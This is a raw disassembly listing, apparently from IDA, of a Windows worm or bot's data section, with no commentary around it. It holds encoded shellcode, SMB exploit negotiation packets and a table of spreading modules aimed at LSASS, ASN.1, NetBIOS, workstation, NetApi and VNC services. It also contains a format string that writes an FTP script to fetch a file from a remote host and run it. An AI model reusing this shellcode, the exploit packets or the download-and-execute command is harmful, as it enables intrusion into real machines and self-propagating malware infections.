aFri db 'Fri',0 ; DATA XREF: .text:0044C14C�o
aThu db 'Thu',0 ; DATA XREF: .text:0044C148�o
aWed db 'Wed',0 ; DATA XREF: .text:0044C144�o
aTue db 'Tue',0 ; DATA XREF: .text:0044C140�o
aMon db 'Mon',0 ; DATA XREF: .text:0044C13C�o
aSun db 'Sun',0 ; DATA XREF: .text:off_44C138�o
align 10h
off_42FBC0 dd offset off_43873C ; DATA XREF: .text:0042FC10�o
; .text:0042FC44�o ...
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_42FBD8 dd offset off_438754 ; DATA XREF: .text:0042FC0C�o
; .text:0042FC40�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
off_42FBF0 dd offset off_449370 ; DATA XREF: .text:0042FC08�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_42FBF0
dd offset off_42FBD8
dd offset off_42FBC0
dd 0
db 0 ; DATA XREF: .text:0042FC38�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 42FC08h, 3 dup(0)
dd offset off_449370
dd offset unk_42FC18
align 10h
dd offset off_42FBD8
dd offset off_42FBC0
dword_42FC48 dd 4 dup(0) dd 2, 42FC40h
dword_42FC60 dd 3 dup(0) dd offset off_438754
dd offset dword_42FC48+8
align 8
off_42FC78 dd offset off_438774 ; DATA XREF: .text:0042FC90�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_42FC78
dd offset off_42FBD8
dd offset off_42FBC0
dword_42FC9C dd 3 dup(0) dd 3, 42FC90h
dword_42FCB0 dd 3 dup(0) dd offset off_438774
dd offset dword_42FC9C+4
align 8
off_42FCC8 dd offset off_4493A0 ; DATA XREF: .text:0042FCE0�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_42FCC8
dd 0
db 0 ; DATA XREF: .text:0042FD08�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 42FCE0h
dword_42FCF8 dd 3 dup(0) dd offset off_4493A0
dd offset unk_42FCE8
dd offset off_42FBC0
dword_42FD10 dd 4 dup(0) dd 1, 42FD0Ch
dword_42FD28 dd 3 dup(0) dd offset off_43873C
dd offset dword_42FD10+8
dd 0
off_42FD40 dd offset off_449400 ; DATA XREF: .text:0042FD58�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_42FD40
dword_42FD5C dd 3 dup(0) dd 1, 42FD58h
dword_42FD70 dd 3 dup(0) dd offset off_449400
dd offset dword_42FD5C+4
align 8
dd 0FFFFFFFFh, 42EBF8h
dword_42FD90 dd 19930520h, 1, 42FD88h, 4 dup(0) dd 0FFFFFFFFh, 42EC1Ch, 0
dd offset loc_42EC0C
dd 1, 42EC14h
dword_42FDC4 dd 19930520h, 3, 42FDACh, 4 dup(0) dd 0FFFFFFFFh, 42EC40h
dword_42FDE8 dd 19930520h, 1, 42FDE0h, 4 dup(0) dd 0FFFFFFFFh, 42EC54h, 0
dd offset loc_42EC5C
align 8
dd offset loc_42EC64
align 10h
dd offset loc_42EC6C
dd 3, 42EC74h, 4, 42EC7Ch, 0
dd offset loc_42EC84
dd 6, 42EC8Ch, 0
dd offset loc_42EC94
dd 8, 42EC9Ch, 9, 42ECA4h, 0
dd offset loc_42ECAC
dd 0Bh, 42ECB4h, 0Ch, 42ECBCh, 0
dd offset loc_42ECC4
dd 0Eh, 42ECCCh, 0
dd offset loc_42ECD4
align 10h
dd offset loc_42ECDC
dd 11h, 42ECE4h, 11h, 42ECECh
dword_42FEA4 dd 19930520h, 14h, 42FE04h, 4 dup(0) dd 0FFFFFFFFh, 42ED00h, 0
dd offset loc_42ED0B
dd 1, 42ED13h, 2, 42ED1Bh, 3, 42ED26h, 4, 42ED31h, 5, 42ED3Ch
dd 6, 42ED44h, 7, 42ED4Fh, 8, 42ED57h, 8, 42ED62h, 8, 42ED6Dh
dd 7, 42ED78h, 0Ch, 42ED83h, 7, 42ED83h, 0Eh, 42ED8Eh
dd 0Fh, 42ED99h, 0Eh, 42EDA4h, 11h, 42EDAFh, 0Eh, 42EDAFh
dd 13h, 42EDBAh, 7, 42EDC5h, 15h, 42EDD0h, 7, 42EDD0h
dd 17h, 42EDDBh, 18h, 42EDE6h, 17h, 42EDF1h, 1Ah, 42EDFCh
dd 17h, 42EDFCh, 1Ch, 42EE07h, 7, 42EE12h, 1Eh, 42EE1Dh
dd 7, 42EE1Dh, 20h, 42EE28h, 21h, 42EE33h, 20h, 42EE3Eh
dd 23h, 42EE49h, 20h, 42EE49h, 25h, 42EE54h, 7, 42EE5Fh
dd 27h, 42EE6Ah, 7, 42EE6Ah, 29h, 42EE75h, 2Ah, 42EE80h
dd 29h, 42EE8Bh, 2Ch, 42EE96h, 29h, 42EE96h, 2Eh, 42EEA1h
dword_430040 dd 19930520h, 30h, 42FEC0h, 4 dup(0)dword_43005C dd 0 dd offset off_43873C
align 8
dd 0FFFFFFFFh, 0
dd 0Ch, 423B61h, 0
dd offset off_438754
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 40F389h, 0
dd offset off_438774
align 10h
dd 0FFFFFFFFh, 0
dword_4300A8 dd 1Ch, 40F728h, 3, 430094h, 430078h, 43005Chdword_4300C0 dd 0 ; sub_40F632+12�o ...
dd offset sub_40F36E
dd 0
dd offset dword_4300A8+8
dd 0FFFFFFFFh, 42EEB8h
dword_4300D8 dd 19930520h, 1, 4300D0h, 4 dup(0) dd 0FFFFFFFFh, 42EECCh
dword_4300FC dd 19930520h, 1, 4300F4h, 4 dup(0)dword_430118 dd 2, 430078h, 43005Chdword_430124 dd 0 dd offset sub_40F36E
align 10h
dd offset dword_430118
dd 0FFFFFFFFh, 42EEE0h
dword_43013C dd 19930520h, 1, 430134h, 4 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_40F6AA
align 10h
dd 2 dup(1), 430168h
dword_43018C dd 19930520h, 2, 430158h, 1, 430178h, 2 dup(0)
; DATA XREF: .text:loc_42EEF4�o
dd 0FFFFFFFFh, 42EF00h, 0
dd offset loc_42EF08
dd 1, 42EF10h, 2, 42EF18h
dword_4301C8 dd 19930520h, 4, 4301A8h, 4 dup(0) dd 0FFFFFFFFh, 42EF2Ch
dword_4301EC dd 19930520h, 1, 4301E4h, 4 dup(0) dd 0FFFFFFFFh, 42EF40h
dword_430210 dd 19930520h, 1, 430208h, 6 dup(0) dd offset off_449370
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 421D53h, 0
dword_430250 dd 3, 430230h, 430078h, 43005Chdword_430260 dd 0 ; sub_421D1A+12�o
dd offset sub_421CDD
dd 0
dd offset dword_430250
dword_430270 dd 19930520h, 1, 430290h, 5 dup(0) dd 0FFFFFFFFh, 42EF54h
dword_430298 dd 19930520h, 1, 4302B8h, 5 dup(0) dd 0FFFFFFFFh, 42EF68h
dword_4302C0 dd 19930520h, 1, 4302E0h, 5 dup(0) dd 0FFFFFFFFh, 42EF7Ch, 0
dd offset off_4493A0
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 421EE9h, 0
dword_430308 dd 1, 4302E8h dword_430310 dd 0 dd offset sub_421F16
dd 0
dd offset dword_430308
dd 30404h, 2 dup(0)
dd 30BB8h, 2F030h, 30618h, 2 dup(0)
dd 30C08h, 2F244h, 303D4h, 2 dup(0)
dd 30CE4h, 2F000h, 30608h, 2 dup(0)
dd 30D30h, 2F234h, 3063Ch, 2 dup(0)
dd 30D4Ah, 2F268h, 305F8h, 2 dup(0)
dd 30D6Ch, 2F224h, 30600h, 2 dup(0)
dd 30D74h, 2F22Ch, 3062Ch, 2 dup(0)
dd 30DC4h, 2F258h, 5 dup(0)
dd 77DD7883h, 77DD6BF0h, 77DD761Bh, 77DDEBE7h, 77DD7753h
dd 77DFD11Bh, 77DFC534h, 77DF08D5h, 77E215D9h, 77DF087Fh
dd 77DFD4C9h, 0
dd 7C80992Fh, 7C80B905h, 7C809B47h, 7C80B974h, 7C80DDF5h
dd 7C812ADEh, 7C81CE03h, 7C80BE01h, 7C835DCAh, 7C80180Eh
dd 7C810B8Eh, 7C810A77h, 7C801A24h, 7C802520h, 7C910331h
dd 7C81CDDAh, 7C80BAA1h, 7C80B6A1h, 7C802367h, 7C810D87h
dd 7C80D262h, 7C8024A7h, 7C831EABh, 7C812782h, 7C80E93Fh
dd 7C8308ADh, 7C809BF8h, 7C8286EEh, 7C81153Ch, 7C80A0D4h
dd 7C830D74h, 7C81AE17h, 7C85F90Fh, 7C80DDFEh, 7C81E0C7h
dd 7C80ABDEh, 7C821363h, 7C8217ACh, 7C8214E3h, 7C83039Bh
dd 7C82C2D3h, 7C834D41h, 7C810111h, 7C80BDB6h, 7C8021CCh
dd 7C8309E1h, 7C8643B5h, 7C801E16h, 7C864230h, 7C864B0Fh
dd 7C863F58h, 7C863DE5h, 7C8098EBh, 7C8310F2h, 7C83632Dh
dd 7C8361EEh, 7C814EEAh, 7C80998Dh, 7C831CB8h, 7C831C45h
dd 7C8216A4h, 7C813093h, 7C833478h, 7C80A35Eh, 7C80D077h
dd 7C832044h, 7C801D77h, 7C80ADA0h, 7C901005h, 7C9010EDh
dd 7C91188Ah, 7C80B829h, 7C80C058h, 7C80B4CFh, 7C810637h
dd 7C802442h, 7C835D54h, 7C80929Ch, 7C80BCCFh, 7C809E01h
dd 7C812641h, 7C81DC03h, 7C80A490h, 7C838A0Ch, 7C812F08h
dd 7C81CF5Bh, 7C814AE7h, 7C81DF77h, 7C862E2Ah, 7C8127A7h
dd 7C809915h, 7C812E76h, 7C80CCA8h, 7C838DE8h, 7C84467Dh
dd 7C9109EDh, 7C809E79h, 7C9179FDh, 7C809A51h, 7C809AE4h
dd 7C812BB6h, 7C810EF8h, 7C814AF2h, 7C809EF1h, 7C810E51h
dd 7C812F39h, 7C80CC97h, 7C809740h, 7C910340h, 7C812D9Fh
dd 7C809BC5h, 7C9105D4h, 7C91043Dh, 7C937A40h, 7C812A09h
dd 7C80977Ah, 7C809766h, 7C8350BFh, 7C80176Bh, 7C80A7D4h
dd 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C809728h, 0
dd 71B2517Fh, 0
dd 7712A63Fh, 0
dd 7CAB8CB2h, 7CA23A4Bh, 7CA40EE0h, 0
dd 7E41AE3Fh, 7E44F209h, 7E41A8ADh, 7E42E5C2h, 0
dd 77C019FFh, 77C018BAh, 77C01A50h, 0
dd 71AB3E00h, 71AB951Eh, 71AB88D3h, 71AB4FD4h, 71AB2B66h
dd 71AB2BC0h, 71AB2DC0h, 71AC1028h, 71AB428Ah, 71AB615Ah
dd 71AB664Dh, 71AB406Ah, 71AB9639h, 71AB3B91h, 71AB8769h
dd 71AB2C69h, 71AB50C8h, 71AB2BF4h, 71AB4519h, 71AB3EA1h
dd 71AB2B66h, 0
db 0D5h ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 49h ; I
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 69h ; i
align 2
aCreatethread db 'CreateThread',0
align 4
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
db '',0
aExitthread db 'ExitThread',0
align 10h
db 1Ah
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aZ_1 db 'z',0
aDeletecritical db 'DeleteCriticalSection',0
db 47h ; G
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
aP_0 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 10h
db 98h ;
db 1, 47h, 65h
aTprocaddress db 'tProcAddress',0
align 2
dw 248h
aLoadlibrarya db 'LoadLibraryA',0
align 2
aQ db '',0
aFreelibrary db 'FreeLibrary',0
db 52h ; R
db 2, 4Ch, 6Fh
aCalfree db 'calFree',0
db 5Eh ; ^
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
a__2 db '.',0
aClosehandle db 'CloseHandle',0
dw 365h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 0DFh ;
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 52h ; R
db 3, 54h, 65h
aRminatethread db 'rminateThread',0
dw 3B9h
aLstrcpya db 'lstrcpyA',0
align 2
retf
; ---------------------------------------------------------------------------
db 1
aGettemppatha db 'GetTempPathA',0
align 2
dw 2ABh
aReadfile db 'ReadFile',0
align 2
dw 310h
aSetfilepointer db 'SetFilePointer',0
align 4
db 5Bh ; [
db 1, 47h, 65h
aTfilesize db 'tFileSize',0
aM db 'M',0
aCreatefilea db 'CreateFileA',0
db 85h ;
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
dw 169h
aGetlasterror db 'GetLastError',0
align 2
aP_1 db '',0
aExitprocess db 'ExitProcess',0
dd 736C03B6h, 6D637274h, 416970h, 65470177h, 646F4D74h
dd 48656C75h, 6C646E61h, 4165h, 72430060h, 65746165h, 636F7250h
dd 41737365h, 3970000h, 74697257h, 6C694665h, 16C0065h
dd 4C746547h, 6C61636Fh, 666E4965h, 416Fh, 655202B8h, 7361656Ch
dd 74754D65h, 7865h, 6544007Ch, 6574656Ch, 656C6946h, 30E0041h
aSetfileattribu db 'SetFileAttributesA',0
align 10h
aZ_2 db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 10h
aI db 'I',0
aCreateeventa db 'CreateEventA',0
align 10h
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
db '=',0
aCopyfilea db 'CopyFileA',0
dw 156h
aGetfileattribu db 'GetFileAttributesA',0
align 4
db 89h ;
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 3B3h
aLstrcmpa db 'lstrcmpA',0
align 2
dw 152h
aGetexitcodepro db 'GetExitCodeProcess',0
align 10h
db 87h ;
db 2, 50h, 65h
aEknamedpipe db 'ekNamedPipe',0
aM_0 db '',0
aDuplicatehandl db 'DuplicateHandle',0
a__3 db '_',0
aCreatepipe db 'CreatePipe',0
align 10h
db 9Ch ;
db 3, 57h, 72h
aIteprivateprof db 'itePrivateProfileStringA',0
align 2
dw 1E9h
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 2
aE db 'E',0
aCreatedirector db 'CreateDirectoryA',0
align 2
dw 14Bh
aGetdrivetype_0 db 'GetDriveTypeA',0
dw 146h
aGetdiskfrees_0 db 'GetDiskFreeSpaceExA',0
db 6Eh ; n
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDriveStringsA',0
dw 3B0h
aLstrcata db 'lstrcatA',0
align 2
dw 3BCh
aLstrcpyna db 'lstrcpynA',0
dw 3BFh
aLstrlena db 'lstrlenA',0
align 2
dw 2AEh
aReadprocessmem db 'ReadProcessMemory',0
dw 27Ch
aOpenprocess db 'OpenProcess',0
db 62h ; b
db 2, 4Dh, 6Fh
aDule32next db 'dule32Next',0
align 10h
db 51h ; Q
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 4
db 60h ; `
db 2, 4Dh, 6Fh
aDule32first db 'dule32First',0
db 'l',0
aCreatetoolhe_0 db 'CreateToolhelp32Snapshot',0
align 10h
dd 7250028Eh, 7365636Fh, 4E323373h, 747865h, 7250028Ch
dd 7365636Fh, 46323373h, 74737269h, 13D0000h, 43746547h
dd 65727275h, 6854746Eh, 64616572h, 1FA0000h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 4
db 0D6h ;
db 1, 47h, 65h
aTtimeformata db 'tTimeFormatA',0
align 2
dw 13Fh
aGetdateformata db 'GetDateFormatA',0
align 10h
db 0B9h ;
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 24Eh
aLocalalloc db 'LocalAlloc',0
align 4
db 14h
db 3, 53h, 65h
aTfiletime db 'tFileTime',0
dw 15Dh
aGetfiletime db 'GetFileTime',0
db 0Ch
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 4
db 2Fh ; /
db 2, 49h, 73h
aDebuggerpresen db 'DebuggerPresent',0
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
a5_0 db '5',0
aCharupperbuffa db 'CharUpperBuffA',0
align 4
db 97h ;
db 1, 49h, 73h
aCharalphanumer db 'CharAlphaNumericA',0
dw 2D5h
aWsprintfa db 'wsprintfA',0
db '&',0
aCharlowera db 'CharLowerA',0
align 4
aUser32_dll_0 db 'USER32.dll',0
align 4
db 34h ; 4
db 2, 53h, 65h
aTsecurityinfo db 'tSecurityInfo',0
dw 21Fh
aSetentriesinac db 'SetEntriesInAclA',0
align 2
dw 10Eh
aGetsecurityinf db 'GetSecurityInfo',0
db 1Ch
align 2
aAdjusttokenp_0 db 'AdjustTokenPrivileges',0
db 4Dh ; M
db 1, 4Ch, 6Fh
aOkupprivilegev db 'okupPrivilegeValueA',0
dd 704F01AAh, 72506E65h, 7365636Fh, 6B6F5473h, 6E65h, 655201F9h
dd 74655367h, 756C6156h, 41784565h, 1E20000h, 4F676552h
dd 4B6E6570h, 78457965h, 1C90041h, 43676552h, 65736F6Ch
dd 79654Bh, 655201ECh, 65755167h, 61567972h, 4565756Ch
dd 4178h, 65470123h, 65735574h, 6D614E72h, 4165h, 41564441h
dd 32334950h, 6C6C642Eh, 1070000h, 6C656853h, 6578456Ch
dd 65747563h, 0C40041h
aShgetspecialfo db 'SHGetSpecialFolderPathA',0
aP_2 db '',0
aShgetfolderpat db 'SHGetFolderPathA',0
align 10h
aShell32_dll_0 db 'SHELL32.dll',0
aA db 'A',0
aWsasocketa_0 db 'WSASocketA',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
dw 6
aWnetaddconne_1 db 'WNetAddConnection2A',0
aMpr_dll_0 db 'MPR.dll',0
aOleaut32_dll db 'OLEAUT32.dll',0
align 2
db 0Ah,0
aVerqueryvaluea db 'VerQueryValueA',0
align 4
db 0
align 2
aGetfileversion db 'GetFileVersionInfoA',0
dw 1
aGetfileversi_0 db 'GetFileVersionInfoSizeA',0
aVersion_dll db 'VERSION.dll',0
dd 65480206h, 6C417061h, 636F6Ch, 6548020Ch, 72467061h
dd 6565h, 745202CCh, 776E556Ch, 646E69h, 6152029Dh, 45657369h
dd 70656378h, 6E6F6974h, 21E0000h
aInterlockeddec db 'InterlockedDecrement',0
align 2
dw 222h
aInterlockedinc db 'InterlockedIncrement',0
align 2
dw 1D8h
aGettimezoneinf db 'GetTimeZoneInformation',0
align 10h
dd 654701BEh, 73795374h, 546D6574h, 656D69h, 6547016Bh
dd 636F4C74h, 69546C61h, 656Dh, 654701AFh, 61745374h, 70757472h
dd 6F666E49h, 1080041h, 43746547h, 616D6D6Fh, 694C646Eh
dd 41656Eh, 654701DEh, 72655674h, 6E6F6973h, 13E0000h
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
db 59h ; Y
db 3, 54h, 6Ch
aSsetvalue db 'sSetValue',0
dw 356h
aTlsalloc db 'TlsAlloc',0
align 2
dw 31Dh
aSetlasterror db 'SetLastError',0
align 2
dw 358h
aTlsgetvalue db 'TlsGetValue',0
db 19h
db 3, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 1B1h
aGetstdhandle db 'GetStdHandle',0
align 2
dw 15Eh
aGetfiletype db 'GetFileType',0
db 19h
db 2, 49h, 6Eh
aItializecrit_0 db 'itializeCriticalSection',0
db 50h ; P
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
dw 20Ah
aHeapdestroy db 'HeapDestroy',0
dd 65480208h, 72437061h, 65746165h, 3780000h, 74726956h
dd 466C6175h, 656572h, 69560375h, 61757472h, 6C6C416Ch
dd 636Fh, 65480210h, 65527061h, 6F6C6C41h, 22C0063h, 61427349h
dd 69725764h, 74506574h, 2120072h, 70616548h, 657A6953h
dd 33D0000h
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 434C023Ah, 5370614Dh, 6E697274h, 4167h, 434C023Bh, 5370614Dh
dd 6E697274h, 5767h, 654700FCh, 49504374h, 6F666Eh, 654700F5h
dd 50434174h, 18B0000h, 4F746547h, 50434D45h, 3620000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
aA_0 db '',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
aU db '',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
db 0B2h ;
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1B5h
aGetstringtypew db 'GetStringTypeW',0
align 10h
db 2Ch ; ,
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 10h
db '',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
db 29h ; )
db 2, 49h, 73h
aBadreadptr db 'BadReadPtr',0
align 4
db 26h ; &
db 2, 49h, 73h
aBadcodeptr db 'BadCodePtr',0
align 4
db 5
db 3, 53h, 65h
aTendoffile db 'tEndOfFile',0
align 4
a4_0 db '4',0
aComparestringa db 'CompareStringA',0
align 2
a5_1 db '5',0
aComparestringw db 'CompareStringW',0
align 4
db 8
db 3, 53h, 65h
aTenvironment_0 db 'tEnvironmentVariableA',0
align 4
dd 3ABh dup(0)
dword_432000 dd 0 dd offset loc_40321E
dd offset loc_41203F
dd offset loc_4127D3
dd offset loc_41381B
dd offset loc_421DC5
dword_432018 dd 0 dword_43201C dd 0 dd offset sub_42322C
dd offset sub_424780
dd offset sub_42AD36
dd offset sub_429B89
dword_432030 dd 0 dword_432034 dd 0 dd offset sub_424828
dword_43203C dd 0 dword_432040 dd 0 dd offset sub_429B9A
dword_432048 dd 2 dup(0) dword_432050 dd 64h, 5 dup(0) db 0
dword_432069 dd 4344h ; sub_40B63F+175�r ...
align 10h
dd 6 dup(0)
dword_432088 dd 87h ; sub_403B2C+4315�r ...
off_43208C dd offset sub_40B63F ; DATA XREF: sub_401906+13A�r
dword_432090 dd 0 dword_432094 dd 1 dd 3264h, 5 dup(0)
dd 32434400h, 7 dup(0)
dd 87h, 40B7DCh, 0
dd 1, 6Ch, 5 dup(0)
dd 41534C00h, 5353h, 6 dup(0)
dd 1BDh, 411E8Fh, 0
dd 1, 3161h, 5 dup(0)
dd 4E534100h, 31h, 6 dup(0)
dd 1BDh, 403088h, 0
dd 1, 3261h, 5 dup(0)
dd 4E534100h, 32h, 6 dup(0)
dd 8Bh, 403088h, 0
dd 1, 626Eh, 5 dup(0)
dd offset loc_424DFF+1
dd 7 dup(0)
dd 8Bh, 413642h, 2 dup(0)
dd 70626Eh, 5 dup(0)
dd 50424E00h, 455049h, 6 dup(0)
dd 401h, 413642h, 2 dup(0)
dd 316B77h, 5 dup(0)
dd 4F4B5700h, 31h, 6 dup(0)
dd 87h, 421B99h, 0
dd 1, 326B77h, 5 dup(0)
dd 4F4B5700h, 32h, 6 dup(0)
dd 1BDh, 421B99h, 0
dd 1, 336B77h, 5 dup(0)
dd 454B5700h, 31h, 6 dup(0)
dd 87h, 421ADFh, 0
dd 1, 346B77h, 5 dup(0)
dd 454B5700h, 32h, 6 dup(0)
dd 1BDh, 421ADFh, 0
dd 1, 656Eh, 5 dup(0)
dd offset dword_454E00
dd 7 dup(0)
dd 8Bh, 412E64h, 0
dd 1, 32656Eh, 5 dup(0)
dd 32454E00h, 7 dup(0)
dd 1BDh, 412E64h, 0
dd 1, 33656Eh, 5 dup(0)
dd 33454E00h, 7 dup(0)
dd 87h, 412E64h, 0
dd 1, 76h, 5 dup(0)
dd 434E5600h, 7 dup(0)
dd 170Ch, 42089Ch, 0
dd 1, 6276h, 5 dup(0)
dd 434E5600h, 42h, 6 dup(0)
dd 170Ch, 421415h, 0
dd 1, 31706Eh, 5 dup(0)
dd 31504E00h, 7 dup(0)
dd 87h, 414046h, 0
dd 1, 32706Eh, 5 dup(0)
dd 32504E00h, 7 dup(0)
dd 8Bh, 414046h, 0
dd 1, 33706Eh, 5 dup(0)
dd 33504E00h, 7 dup(0)
dd 1BDh, 414046h, 0
dd 1, 12h dup(0)
dword_4325F0 dd 31706Eh, 5 dup(0) dd 626E0100h, 5 dup(0)
dd 1000000h, 64h, 5 dup(0)
dd 32640100h, 5 dup(0)
dd 1000000h
dword_432658 dd 64h, 5 dup(0) dd 706E0100h, 33h, 4 dup(0)
dd 1000000h, 656Eh, 5 dup(0)
dd offset dword_610100
dd 5 dup(0)
dd 1000000h
dword_4326C0 dd 31706Eh, 5 dup(0) dd 656E0100h, 33h, 4 dup(0)
dd 1000000h, 3264h, 5 dup(0)
dd 100h
dword_432710 dd 32656Eh, 5 dup(0) dd 706E0100h, 32h, 4 dup(0)
dd 1000000h, 64h, 5 dup(0)
dd 100h
dword_432760 dd 76h, 5 dup(0) dd 62760100h, 5 dup(0)
dd 1000000h, 70626Eh, 5 dup(0)
dd 100h
dword_4327B0 dd 33706Eh, 5 dup(0) dd 656E0100h, 5 dup(0)
dd 1000000h, 626Eh, 5 dup(0)
dd 100h
dword_432800 dd 3264h, 5 dup(0) dd 640100h, 5 dup(0)
dd 1000000h, 31706Eh, 5 dup(0)
dd 6B770100h, 33h, 4 dup(0)
dd 1000000h
dword_432868 dd 64h, 5 dup(0) dd 32640100h, 5 dup(0)
dd 1000000h, 6Ch, 5 dup(0)
dd 100h
dword_4328B8 dd 64h, 5 dup(0) dd 31610100h, 5 dup(0)
dd 1000000h, 3261h, 5 dup(0)
dd 100h
dword_432908 dd 626Eh, 5 dup(0) dd 626E0100h, 70h, 4 dup(0)
dd 1000000h, 32706Eh, 5 dup(0)
dd 100h
dword_432958 dd 4 dword_43295C dd 4 dword_432960 dd 3 dword_432964 dd 3 dword_432968 dd 3 dword_43296C dd 3 dword_432970 dd 4 dword_432974 dd 3 dword_432978 dd 3 dword_43297C dd 3 dword_432980 dd 0E983C931h, 0FFFFE8B0h, 5EC0FFFFh, 410E7681h, 839088B7h
; DATA XREF: .text:004030CB�o
; sub_40B427+4B�o ...
dd 0F4E2FCEEh, 0DD63DDBDh, 6F774EA9h, 0FC03D7BEh, 0D5039365h
dd 95F43C7Dh, 1B67B639h, 0CF03AF0Eh, 0D963B661h, 910383CAh
dd 94886AFh, 0E44833EDh, 9D427646h, 64637540h, 0B8ACE37Ah
dd 0CF035234h, 0F663B665h, 1BC3BBCAh, 7B89AB1Eh, 19039B42h
dd 0F194932Dh, 0F4538682h, 1BB8F4CAh, 0E003BB01h, 0D0031A5Dh
dd 1EE0E949h, 0C064B90Fh, 0C3EE61BEh, 0A2BBDF27h, 0A2FBC029h
dd 4077E31Eh, 6C657C29h, 4677E77Ah, 0F66D3E1Eh, 92805AC0h
dd 6F8ADD14h, 9951DF91h, 6FDF1AB4h, 0C3DBE497h, 0C3CBE412h
dd 4077E402h, 658BDF27h, 7101E427h, 8A2CDFD4h, 6FDF7031h
dd 0C198DD97h, 0F8584814h, 79A61AE5h, 0C35E4816h, 0F8584814h
dd 0D90EFEA4h, 0C05E4816h, 6FDDE315h, 77E02491h, 0C7F17138h
dd 6FDD61BEh, 0F4E2D191h, 0FDEBDF27h, 0C0E252C8h, 19449E18h
dd 19CCDDA6h, 634886A3h, 0BDCA49EBh, 3A4F5BFh, 3BB0CDCCh
dd 0E2E01CEAh, 6F9E04BFh, 4677F334h, 0C1DAE01Ah, 91E2E610h
dd 0C1DDE610h, 3DE067BEh, 0C346B298h, 6FE261BEh, 407780BEh
dd 1374E0CAh, 4677D385h, 0F8584813h, 0F06879AEh, 6F5E4812h
dd 9088B791h, 0
dd 159h
dword_432AE0 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_432B2C dd 3000005h, 10h, 18h, 1, 3 dup(0)dword_432B48 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_401AB3+13F�o
dword_432B5C dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_401AB3+168�o
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 2 dup(0)
dd 44000081h, 464B4320h, 454E4544h, 45444643h, 46434646h
dd 46464547h, 43414343h, 2 dup(43414341h), 45200041h, 4644454Bh
dd 45494545h, 43414344h, 4 dup(43414341h), 414141h, 0
dd 2F000000h, 424D53FFh, 72h, 4 dup(0)
dd 25C0000h, 0
dd 2000C00h, 4C20544Eh, 2E30204Dh, 3231h, 48000000h, 424D53FFh
dd 73h, 4 dup(0)
dd 25C0000h, 0
dd 0FF0Dh, 2FFFF00h, 25C00h, 2 dup(0)
dd 1000000h, 0B000000h, 6E000000h, 79700074h, 626D73h
dd 0
aEftpdDTotalDIn db ' (EFTPD): (%d), Total -> (%d in %s)',0 ; DATA XREF: start+9A�o
aSD db ' (%s: %d),',0 ; DATA XREF: start+4C�o
align 4
aSStats db '%s (Stats):',0 ; DATA XREF: start+1A�o
aCCCCCC db '%c%c%c%c%c%c',0 ; DATA XREF: sub_4010E7+66�o
align 4
aS_4 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401160+153�o
; sub_41015C+58�o ...
align 10h
aEchoOpenSDIEch db 'echo open %s %d > i &echo user %s %s >> i &echo get %s >> i &echo'
; DATA XREF: sub_401160+114�o
db ' quit >> i &ftp -n -s:i &start %s',0Dh,0Ah,0
align 4
aSDDDDD_exe db '%s%d%d%d%d%d.exe',0 ; DATA XREF: sub_401160+C3�o
; sub_4130E5+253�o ...
align 4
